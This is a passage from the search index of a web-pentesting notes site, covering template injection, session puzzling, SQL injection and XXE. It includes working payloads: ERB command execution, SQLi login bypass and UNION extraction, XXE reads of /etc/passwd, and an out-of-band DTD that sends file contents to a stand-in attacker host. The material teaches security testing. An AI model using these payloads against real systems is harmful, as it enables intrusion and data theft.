• Anything coming between\u00a0{{\u00a0and\u00a0}}\u00a0is evaluated and sent back to the output.

                        {{ 2*2 }}\u00a0-> 4

                        • {% import module %} - Allows you to import python modules.

                        {% import subprocess %}

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#4-ruby-frameworks","title":"4. Ruby frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#41-erb","title":"4.1. ERB","text":"

                        Basic injection:

                        <%= 7 * 7 %>\n

                        Retrieve /etc/passwd

                        <%= File.open('/etc/passwd').read %>\n

                        List files and directories

                        <%= Dir.entries('/') %>\n\n\n<%= File.open('/example/arbitrary-file').read %>\n

                        Code execution

                        <%= system('cat /etc/passwd') %>\n<%= `ls /` %>\n<%= IO.popen('ls /').readlines()  %>\n<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>\n<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#tools","title":"Tools","text":"
                        • Tplmap
                        • Backslash Powered Scanner Burp Suite extension
                        • Template expression test strings/payloads list
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#related-lab","title":"Related lab","text":"

HackTheBox: Nunchucks: an Express server with the Nunjucks template engine.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/","title":"Session Puzzling - Session Variable Overloading","text":"

                        Owasp vuln description: https://owasp.org/www-community/vulnerabilities/Session_Variable_Overloading.

Session Variable Overloading (also known as Session Puzzling, or Temporal Session Race Conditions) is an application level vulnerability which can enable an attacker to perform a variety of malicious actions. This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers, so that the session variable is set in one context and then used in another.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#demo","title":"Demo","text":"

                        From 2011!!!!!!

                        <iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/-DackF8HsIE\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/","title":"SQL injection","text":"

SQL stands for Structured Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database: to view, retrieve, modify, or delete data, or even to compromise the infrastructure (for instance, with a denial-of-service attack).

                        A detailed SQLi Cheat sheet for manual attack.

                        OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                        ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Sources for these notes
                        • My Ine: eWPTv2.
                        • Hacktricks.
                        • OWASP: WSTG Testing for SQL injection.
• Notes during the Cybersecurity Bootcamp at The Bridge.
                        • Experience pentesting applications.
Languages and dictionaries

| Server | Dictionary |
| --- | --- |
| MySQL | MySQL payloads |
| MSSQL | MSSQL payloads |
| PostgreSQL | PostgreSQL payloads |
| Oracle | Oracle SQL payloads |
| SQLite | SQLite payloads |
| Cassandra | Cassandra payloads |

Attack-based dictionaries
                        • Generic SQL Injection Payloads
                        • Generic Error Based Payloads.
                        • Generic Union Select Payloads.
                        • SQL time based payloads .
                        • SQL Injection Auth Bypass Payloads
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-does-sql-injection-work","title":"How does SQL injection work?","text":"

                        1. Retrieving hidden data

                        Examples at a shopping application

| Request URL | SQL Query | Explained |
| --- | --- | --- |
| http://insecure-website.com/products?category=Gifts | SELECT * FROM products WHERE category='Gifts' AND released=1 | The restriction "released" is used to hide products that are not released; unreleased products presumably have released=0. |
| http://insecure-website.com/products?category=Gifts'-- | SELECT * FROM products WHERE category='Gifts'--' AND released=1 | The double-dash sequence -- is a comment indicator in SQL, so the rest of the query is interpreted as a comment. The application displays all the products in the category, released or not. |
| https://insecure-website.com/products?category=Gifts'+OR+1=1-- | SELECT * FROM products WHERE category='Gifts' OR 1=1--' AND released=1 | This returns all items where the category is Gifts, or 1=1. Since 1=1 is always true, the query returns all items. |

                        2. Subverting application logic

| Request | SQL Query | Explained |
| --- | --- | --- |
| Login | SELECT * FROM users WHERE username='admin' AND password='lalalala' | Login process, probably with a POST method. |
| Login: adding admin'-- in the username field and anything in the password field | SELECT * FROM users WHERE username='admin'-- ' AND password='' | This query returns the user whose name is admin and successfully logs the attacker in as that user. |","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#clasification","title":"Classification","text":"

SQLi (short for SQL injection) typically falls into three categories.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-in-band-sqli-or-classic-sql-injection","title":"1. In-band SQLi / or Classic SQL injection","text":"

In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker uses the same communication channel to send the attack and receive the results: the attacker injects malicious SQL code into the web application and collects the output of the attack through that same channel. In-band SQL injection attacks are dangerous because they can be used to steal sensitive information, modify or delete data, or take over the entire web application or even the entire server.

                        In-band SQL injection can be further divided into two subtypes/exploitation techniques:

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#11-error-based-sqli","title":"1.1. Error-based SQLi","text":"

                        Error-based SQL injection: In error-based SQL injection, the attacker injects SQL code that causes the web application to generate an error message. The error message can contain valuable information about the database schema or the contents of the database itself, which the attacker can use to further exploit the vulnerability.

                        The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#12-union-based-sqli","title":"1.2. Union-based SQLi","text":"

                        The UNION operator is used in SQL to combine the results of two or more SELECT statements into a single result set. Therefore, it requires that the number of columns and their data types match in the SELECT statements being combined.

                        Union-based SQL injection: In union-based SQL injection, the attacker injects additional SELECT statements through the vulnerable input. By manipulating the injected SQL code, the attacker can extract data from the database that they are not authorized to access.

                        Here's an example to illustrate the concept. Consider the following vulnerable code snippet:

                        SELECT id, name FROM users WHERE id = '<user_input>'\n

                        An attacker can exploit this vulnerability by injecting a UNION-based attack payload into the parameter. They could inject a statement like:

                        ' UNION SELECT credit_card_number, 'hack' FROM credit_cards --\n

                        The injected payload modifies the original query to retrieve the credit card numbers along with a custom value ('hack') from the credit_cards table. The double dash at the end is used to comment out the remaining part of the original query.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-inferential-blind-sqli","title":"2. Inferential (Blind) SQLi","text":"

                        Blind SQL Injection is a type of SQL Injection attack where an attacker can exploit a vulnerability in a web application that does not directly reveal information about the database or the results of the injected SQL query. In this type of attack, the attacker injects malicious SQL code into the application's input field, but the application does not return any useful information or error messages to the attacker in the response. The attacker typically uses various techniques to infer information about the database, such as time delays or Boolean logic. The attacker may inject SQL code that causes the application to delay for a specified amount of time, depending on the result of a query.

                        Blind SQL injection can be further divided into two subtypes/exploitation techniques:

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#21-boolean-based-content-based-blind-sqli","title":"2.1. Boolean-based (content-based) Blind SQLi","text":"

                        Boolean-based SQL Injection: In this type of attack, the attacker exploits the application's response to boolean conditions to infer information about the database. The attacker sends a malicious SQL query to the application and evaluates the response based on whether the query executed successfully or failed.

                        Inferential SQL injection technique that relies on sending a SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

                        See this example:

                        ' OR LENGTH(database()) > 5--\n

This payload tests whether the length of the database name is greater than 5 characters. Afterwards, you can start testing each character and thereby retrieve the name of the database, as shown in the sketch below.
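A character-by-character extraction loop built on such a boolean oracle could look like the following sketch (the endpoint, parameter, and TRUE-response marker are assumptions about the target; MySQL syntax):

import string

import requests  # assumed third-party dependency

URL = "https://insecure-website.com/products"  # hypothetical injectable endpoint
TRUE_MARKER = "Gifts"  # any text that appears only on a TRUE response (assumption)

def extract_db_name(max_length: int = 32) -> str:
    """Recover the database name one character at a time via the boolean oracle."""
    name = ""
    charset = string.ascii_lowercase + string.digits + "_"
    for position in range(1, max_length + 1):
        for candidate in charset:
            payload = f"Gifts' AND SUBSTRING(database(),{position},1)='{candidate}'-- "
            r = requests.get(URL, params={"category": payload}, timeout=10)
            if TRUE_MARKER in r.text:
                name += candidate
                break
        else:
            break  # no candidate matched: we reached the end of the name
    return name

print(extract_db_name())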

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#22-time-based-blind-sqli","title":"2.2. Time-Based Blind SQLi","text":"

                        Time-based Blind Injection: In this type of attack, the attacker exploits the application's response time to infer information about the database. The attacker sends a malicious SQL query to the application and measures the time it takes for the application to respond.

If you don't get a TRUE or FALSE response, you may sometimes infer whether the result is TRUE or FALSE from the response time. Time-based SQL injection is an inferential SQL injection technique that relies on sending a SQL query which forces the database to wait for a specified amount of time (in seconds) before responding. The response time indicates to the attacker whether the result of the query is TRUE or FALSE.
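The same oracle idea works with time instead of content. A sketch for a MySQL backend (the endpoint and parameter are again assumptions):

import time

import requests  # assumed third-party dependency

URL = "https://insecure-website.com/products"  # hypothetical injectable endpoint

def condition_is_true(condition: str, delay: int = 5) -> bool:
    """Time-based oracle: the response is slow only when the condition holds (MySQL)."""
    payload = f"Gifts' AND IF(({condition}),SLEEP({delay}),0)-- "
    start = time.monotonic()
    requests.get(URL, params={"category": payload}, timeout=delay + 25)
    return time.monotonic() - start >= delay

print(condition_is_true("LENGTH(database())>5"))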

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#3-out-of-band-sqli","title":"3. Out-of-Band SQLi","text":"

                        Out-of-band SQL Injection is the least common type of SQL injection attack. It involves an attacker exploiting a vulnerability in a web application to extract data from a database using a different channel, other than the web application itself. Unlike in-band SQL Injection, where the attacker can observe the result of the injected SQL query in the application's response, out-of-band SQL Injection does not require the attacker to receive any response from the application. The attacker can use various techniques to extract data from the database, such as sending HTTP requests to an external server controlled by the attacker or using DNS queries to extract data.

It's used when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band SQLi techniques rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker.

Such is the case of Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server that an attacker controls, as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server that an attacker controls.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#databases","title":"Databases","text":"

                        In computing, a database is typically managed by a Database Management System (DBMS) that provides a set of tools and interfaces to interact with the data. DBMS stands for \"Database Management System\". It is a software system that enables users to create, store, organize, manage, and retrieve data from a database.

                        DBMS provides an interface between the user and the database, allowing users to interact with the database without having to understand the underlying technical details of data storage, retrieval, and management. DBMS provides various functionalities such as creating, deleting, modifying, and querying the data stored in the database. It also manages security, concurrency control, backup, recovery, and other important aspects of data management.

                        Types of databases:

                        • Relational Databases - A database that organizes data into one or more tables or relations, where each table represents an entity or a concept, and the columns of the table represent the attributes of that entity or concept. SQL databases are relational databases that store data in tables with rows and columns, and use SQL (Structured Query Language) as their standard language for managing data. They enforce strict data integrity rules and support transactions to ensure data consistency. SQL databases are widely used in applications that require complex data queries and the ability to handle large amounts of structured data. Some examples of SQL databases include MySQL, Oracle, Microsoft SQL Server, and PostgreSQL.
                        • NoSQL Databases - A type of database that does not use the traditional tabular relations used in relational databases. Instead, NoSQL databases use a variety of data models to store and access data.
                        • Object-oriented Databases - A database that stores data as objects rather than in tables, allowing for more complex data structures and relationships.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-rdbms-relational-database-management-system","title":"1. RDBMS - Relational Database Management System","text":"

RDBMS stands for Relational Database Management System. It is a software system that enables the creation, management, and administration of relational databases. RDBMSs are designed to store, organize, and retrieve large amounts of structured data efficiently. RDBMSs provide a set of features and functionalities that allow users to create database schemas, define relationships between tables, insert, update, and retrieve data, and perform complex queries using SQL. They also handle aspects like data security, transaction management, and concurrency control to ensure data integrity and consistency.

                        The following are examples of popular DBMS (Database Management Systems):

                        • MySQL - A free, open-source relational database management system that is widely used for web applications.
                        • PostgreSQL - Another popular open-source relational database management system that is known for its advanced features and reliability.
                        • Oracle Database - A commercial relational database management system developed by Oracle Corporation that is widely used in enterprise applications.
• Microsoft SQL Server - A commercial relational database management system developed by Microsoft.

                        How relational databases work:

                        • Tables: The basic building blocks of a relational database are tables, also known as relations. A table consists of rows (also called records or tuples) and columns (also known as attributes). Each row represents a unique record or instance of an entity, and each column represents a specific attribute or characteristic of that entity.

                        • Keys: Keys are used to uniquely identify records within a table and establish relationships between tables. The primary key is a column or set of columns that uniquely identifies each row in a table. It ensures the integrity and uniqueness of the data. Foreign keys are columns in one table that reference the primary key of another table, establishing relationships between the tables.

                        • Relationships: Relationships define how tables are connected or associated with each other. Common types of relationships include one-to-one, one-to-many, and many-to-many. These relationships are established using primary and foreign keys, allowing data to be linked and retrieved across multiple tables.

                        • Structured Query Language (SQL): Relational databases are typically accessed and manipulated using the Structured Query Language (SQL). SQL provides a standardized language for querying, inserting, updating, and deleting data from relational databases. It allows users to perform operations such as retrieving specific records, filtering data based on conditions, joining tables to combine data, and aggregating data using functions.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-nosql","title":"2. NoSQL","text":"

NoSQL (Not Only SQL) databases are a type of database management system that differ from traditional relational databases (RDBMS) in terms of data model, scalability, and flexibility. NoSQL databases are designed to handle large volumes of unstructured, semi-structured, and rapidly changing data. NoSQL databases are commonly used in modern web applications, big data analytics, real-time streaming, content management systems, and other scenarios where the flexibility, scalability, and performance advantages they offer are valuable.

                        There are several popular NoSQL databases available, each with its own strengths and use cases. Here are some examples of well-known NoSQL databases:

                        • MongoDB: MongoDB is a document database that stores data in flexible, JSON-like documents. It provides scalability, high performance, and rich query capabilities. MongoDB is widely used in web applications, content management systems, and real-time analytics. It uses MQL (MongoDB Query Language).
                        • Redis: Redis is an in-memory data store that supports various data structures, including strings, hashes, lists, sets, and sorted sets. It is known for its exceptional performance and low latency. Redis is often used for caching, real-time analytics, session management, and pub/sub messaging.
                        • Amazon DynamoDB.
                        • CouchBase Server.
• Apache Cassandra: Distributed columnar database designed to handle large amounts of data across multiple commodity servers. It offers high availability, fault tolerance, and linear scalability.
                        • Apache HBase.
                        • Riak.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-web-applications-utilize-sql-queries","title":"How web applications utilize SQL queries","text":"

                        The following code contains a PHP example of a connection to a MySQL database and the execution of a SQL query.

                        $dbhostname='1.2.3.4';\n$dbuser='username';\n$dbpassword='password';\n$dbname='database';\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username, Password FROM Accounts;\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

Most of the time, queries are not static; they are dynamically built from user input. Here you can find a vulnerable dynamic query example:

                        $id = $_GET['id'];\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='$id';\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

                        If an attacker crafts an $id value which can actually change the query, like:

                        ' OR 'a'='a\n

                        Then the query becomes:

                        SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';\n

                        This tells the database to select the items by checking two conditions:

• The id must be empty (id='') OR an always-true condition ('a'='a')
• Since the first condition is not met, the SQL engine evaluates the second condition of the OR, which is crafted as an always-true condition.

                        In other words, this tells the database to select all the items in the Products table.
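For contrast, a parameterized query neutralizes this payload because the value travels separately from the SQL text. A sketch using the mysql-connector-python driver (connection details mirror the PHP example above and are placeholders):

import mysql.connector  # assumed driver (mysql-connector-python)

connection = mysql.connector.connect(host="1.2.3.4", user="username",
                                     password="password", database="database")
cursor = connection.cursor(prepared=True)

user_id = "' OR 'a'='a"  # the attacker-controlled value from above
# The value is sent separately from the SQL text, so it is treated as data,
# never as query syntax: no row matches this literal ID.
cursor.execute("SELECT Name, Description FROM Products WHERE ID = %s", (user_id,))
print(cursor.fetchall())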

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#common-injectable-fields","title":"Common injectable fields","text":"

                        SQL injection vulnerabilities can exist in various input fields within an application.

                        • Login forms: The username and password fields in a login form are common targets for SQL injection attacks.
                        • Search boxes: Input fields used for searching within an application are potential targets for SQL injection. If the search query is directly incorporated into a SQL statement without proper validation, an attacker can inject malicious SQL code to manipulate the query and potentially access unauthorized data.
                        • URL parameters: Web applications often use URL parameters to pass data between pages. If the application uses these parameters directly in constructing SQL queries without proper validation and sanitization, it can be susceptible to SQL injection attacks.
                        • Form fields: Any input fields in forms, such as registration forms, contact forms, or comment fields, can be vulnerable to SQL injection if the input is not properly validated and sanitized before being used in SQL queries.
                        • Hidden fields: Hidden fields in HTML forms can also be susceptible to SQL injection attacks if the data from these fields is directly incorporated into SQL queries without proper validation.
                        • Cookies: In some cases, cookies containing user data or session information may be used in SQL queries. If the application does not validate or sanitize the cookie data properly, it can lead to SQL injection vulnerabilities.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
• Detailed Cheat sheet with manual union and blind attacks can be found in the SQLi Cheat sheet for manual attack.
• https://portswigger.net/web-security/sql-injection/cheat-sheet.
• https://github.com/payloadbox/sql-injection-payload-list.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/xml-external-entity-xee/","title":"XXE - XEE XML External Entity attacks","text":"Sources
                        • HackTricks.
• Portswigger.
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#basic-concepts","title":"Basic concepts","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-it-xml","title":"What it XML?","text":"

                        XML stands for \"extensible markup language\". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-entities","title":"What are XML entities?","text":"

XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-elements","title":"What are XML elements?","text":"

                        Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:

<!ELEMENT root ANY> Means that any object could be inside the parent <root></root>\n\n<!ELEMENT root EMPTY> Means that it should be empty: <root></root>\n\n<!ELEMENT root (name,password)> Declares that <root> can have the children <name> and <password>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-is-document-type-definition","title":"What is document type definition?","text":"

The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD"), can be loaded from elsewhere (known as an "external DTD"), or can be a hybrid of the two.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#how-xml-custom-entities-work","title":"How XML custom entities work?","text":"

                        XML allows custom entities to be defined within the DTD. For example:

                        <!DOCTYPE foo [ <!ENTITY myentity \"my entity value\" > ]>\n

                        This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: \"my entity value\".

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-external-entities","title":"What are XML external entities?","text":"

                        XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

                        <!DOCTYPE foo [ <!ENTITY ext SYSTEM \"http://normal-website.com\" > ]>\n

                        The URL can use the file:// protocol, and so external entities can be loaded from file. For example:

<!DOCTYPE nameThatYouWant [ <!ENTITY nameofEntity SYSTEM \"file:///path/to/file\" > ]>\n<root>\n    <name>&nameofEntity;</name>\n    <password>1</password>\n</root>\n\n# nameThatYouWant: string with the name that you want\n# nameofEntity: we will reference the entity using this name\n# <!ENTITY: there might be more than one entity defined\n# SYSTEM: allows us to load the entity from a URL\n# file:// -> to load a local file. Instead of file:// we can also use:\n    # http://\n    # ftp://\n    # ssh://\n    # php://\n# &nameofEntity;  -> This is how you request the object\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#classic-xml-external-entity","title":"Classic XML External Entity","text":"
# Classic XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\" > ]>\n<name>&xxe;</name>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#base-encoded-xml-external-entity","title":"Base-encoded XML External Entity","text":"
# Base encoded XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&xxe;</name>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#blind-xml-external-entity-out-of-band","title":"Blind XML External Entity - Out of Band","text":"
                        # Blind XXE 1\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                        # Blind XXE 2\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://malicious.com/exploit\"> %xxe; ]>\n\n    # http://malicious.com/exploit will contain another entity such as \n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#but-why-external-entities-are-accepted","title":"But why external entities are accepted","text":"

This is a snippet of PHP code that accepts external DTDs:

<?php\n\nlibxml_disable_entity_loader (false);\n// libxml_disable_entity_loader (true);\n\n$xmlfile = file_get_contents('php://input');\n$dom = new DOMDocument();\n$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);\n$info = simplexml_import_dom($dom);\n$name = $info->name;\n$password = $info->password;\n\necho \"Sorry, this $name is not available\";\n?>\n

External DTD loading is enabled in this line:

                        libxml_disable_entity_loader (false);\n
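The same dangerous switch exists in other stacks. For instance, Python's lxml only resolves external entities when the parser is configured to do so; a sketch (lxml is a third-party package):

from lxml import etree  # third-party package (pip install lxml)

xml = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><name>&xxe;</name></root>"""

# Vulnerable configuration: DTD loading and entity resolution enabled
vulnerable = etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)
print(etree.fromstring(xml, vulnerable).findtext("name")[:60])

# Safer configuration: refuse to resolve entities at all
safe = etree.XMLParser(resolve_entities=False)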
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#main-attacks","title":"Main attacks","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#new-entity-test","title":"New Entity test","text":"

                        In this attack I'm going to test if a simple new ENTITY declaration is working:

                        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [<!ENTITY toreplace \"3\"> ]>\n<stockCheck>\n    <productId>&toreplace;</productId>\n    <storeId>1</storeId>\n</stockCheck>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#1-retrieve-files","title":"1. Retrieve files","text":"

                        Modify the submitted XML in two ways:

                        • Introduce (or edit) a\u00a0DOCTYPE\u00a0element that defines an external entity containing the path to the file.
                        • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

                        In a windows system, we may use c:/windows/system32/drivers/etc/hosts:

                        POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 192\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>\n<order>\n    <quantity>2</quantity>\n    <item>&test;</item>\n    <address>1</address>\n</order>\n

On a Linux server, go for:

                        # example 1\n<?xml version = \"1.0\"?><!DOCTYPE foo [<!ENTITY example1 SYSTEM \"/etc/passwd\"> ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example1;</item>\n    <address>1</address>\n</order>\n\n\n# example 2\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY example2 SYSTEM \"file:///etc/passwd\" > ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example2;</item>\n    <address>1</address>\n</order>\n

                        Encoding techniques

# Base encoded XXE\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&xxe;</name>\n

This filter returns the file base64-encoded, avoiding data loss and truncation.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#2-chaining-xxe-to-ssrf-attacks","title":"2. Chaining XXE to SSRF attacks","text":"

                        To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value.

                        <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"http://internal.vulnerable-website.com/\"> ]>\n

                        You would then make use of the defined entity in a data value within the XML.
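
                        For instance, reusing the order structure from the file-retrieval examples above (the element names are assumptions carried over from those examples):

                        <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"http://internal.vulnerable-website.com/\"> ]>\n<order>\n    <quantity>2</quantity>\n    <item>&xxe;</item>\n    <address>1</address>\n</order>\n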

                        See this lab for an example of exploitation.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#3-blind-xxe-vulnerabilities","title":"3. Blind XXE vulnerabilities","text":"

                        Sometimes the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

                        Blind XXE requires out-of-band techniques: the parameter entity (for example, xxe) is referenced right after its ENTITY definition. XML parameter entities are a special kind of XML entity which can only be referenced within the DTD.

                        <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://internal.vulnerable-website.com/\"> %xxe;]>\n

                        You don't need to make use of the defined entity in a data value within the XML, since %xxe; already invokes the entity.
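
                        To detect the blind XXE, point the entity's SYSTEM URL at a host we control and watch for the incoming request (a minimal sketch; port 80 is an assumption):

                        nc -lnvp 80\n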

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#4-blind-xxe-with-data-exfiltration-out-of-band-blind-xxe-with-oob-data-exfiltration","title":"4. Blind XXE with data exfiltration out-of-band (Blind XXE with OOB data exfiltration)","text":"

                        1. Create a malicious.dtd file:

                        <!ENTITY % file SYSTEM \"file:///etc/passwd\"> \n<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>\"> %eval; %exfiltrate;\n
                        Basically, malicious.dtd retrieves /etc/passwd from the instance on which it is executed and sends its contents to the attacker's server as a URL parameter.

                        2. Serve our malicious.dtd from http://attacker.com/malicious.dtd.
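
                        Any simple web server works for this step (a minimal sketch, run from the directory containing malicious.dtd):

                        python3 -m http.server 80   # binding port 80 may require sudo\n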

                        3. Submit a payload to the victim via blind XXE with an XML parameter entity.

                        <!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/malicious.dtd\"> %xxe;]>\n

                        This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#5-blind-xxe-to-retrieve-data-via-error-messages","title":"5. Blind XXE to retrieve data via error messages","text":"

                        An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.

                        • Trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:
                        <!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error;\n

                        Invoking the malicious external DTD may result in an error message like the following:

                        java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#6-blind-xxe-by-repurposing-a-local-dtd","title":"6. Blind XXE by repurposing a local DTD","text":"

                        If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.

                        Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

